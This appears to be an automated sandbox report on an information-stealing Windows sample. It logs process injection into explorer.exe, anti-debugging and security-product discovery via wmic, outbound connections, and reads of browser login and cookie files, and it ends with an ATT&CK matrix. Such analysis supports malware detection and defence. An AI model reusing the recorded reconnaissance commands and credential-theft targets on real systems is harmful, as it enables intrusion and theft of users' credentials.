                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: F1A1.tmp.11.drBinary or memory string: global block list test formVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: explorer.exe, 0000000B.00000003.2411772678.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - EU East & CentralVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: F1A1.tmp.11.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: F1A1.tmp.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: F1A1.tmp.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: F1A1.tmp.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Users\user\AppData\Roaming\hehcrfbAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Roaming\fihcrfbAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,14_2_00C21B17
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00401000
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00C21016
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,9_2_00007FF780B678EC
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00792017 push dword ptr fs:[00000030h]0_2_00792017
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_0216092B mov eax, dword ptr fs:[00000030h]0_2_0216092B
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_02160D90 mov eax, dword ptr fs:[00000030h]0_2_02160D90
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_005F092B mov eax, dword ptr fs:[00000030h]4_2_005F092B
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_005F0D90 mov eax, dword ptr fs:[00000030h]4_2_005F0D90
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_006410AF push dword ptr fs:[00000030h]4_2_006410AF
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_006CFE2B push dword ptr fs:[00000030h]7_2_006CFE2B
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_0216092B mov eax, dword ptr fs:[00000030h]7_2_0216092B
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02160D90 mov eax, dword ptr fs:[00000030h]7_2_02160D90
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_006C092B mov eax, dword ptr fs:[00000030h]8_2_006C092B
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_006C0D90 mov eax, dword ptr fs:[00000030h]8_2_006C0D90
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_00710113 push dword ptr fs:[00000030h]8_2_00710113
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B62654 GetProcessHeap,RtlReAllocateHeap,9_2_00007FF780B62654
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00401000
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00403EE2
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00408D0A
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_004047EE SetUnhandledExceptionFilter,33_2_004047EE
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00401000
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00403EE2
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00408D0A
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004047EE SetUnhandledExceptionFilter,34_2_004047EE

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: 354F.exe.2.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 109.121.204.14 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.228.112.175 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeThread created: C:\Windows\explorer.exe EIP: A6F19A8Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbThread created: unknown EIP: 7FC19A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeThread created: unknown EIP: 2CE1970Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbThread created: unknown EIP: 87F1970Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 1012 base: F479C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 5268 base: 7FF62D872D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 1996 base: F479C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 7144 base: 7FF62D872D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 6784 base: F479C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 7252 base: 7FF62D872D10 value: 90Jump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F479C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F479C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F479C0Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe16_2_00AD10A5
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe16_2_00AD1016
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                  Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1504842571.00000000044D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                  Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C855EB cpuid 11_2_00C855EB
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: GetLocaleInfoA,33_2_00408EA0
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: GetLocaleInfoA,34_2_00408EA0
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00418C80 InterlockedCompareExchange,SetFocus,ReadConsoleA,FindAtomW,SearchPathA,GetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExA,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameW,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,WaitForSingleObject,SetCommMask,GetUserObjectInformationW,GetConsoleAliasesLengthA,GetComputerNameW,GetConsoleAliasExesLengthW,GetBinaryType,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,0_2_00418C80
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C32198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,11_2_00C32198
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
                  Source: Yara matchFile source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
                  Source: Yara matchFile source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  2
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  11
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault Accounts13
                  Native API
                  Boot or Logon Initialization Scripts522
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  11
                  Input Capture
                  3
                  File and Directory Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  259
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  4
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Command and Scripting Interpreter
                  Login HookLogin Hook12
                  Software Packing
                  NTDS881
                  Security Software Discovery
                  Distributed Component Object Model11
                  Input Capture
                  115
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets34
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  File Deletion
                  Cached Domain Credentials4
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Hidden Files and Directories
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
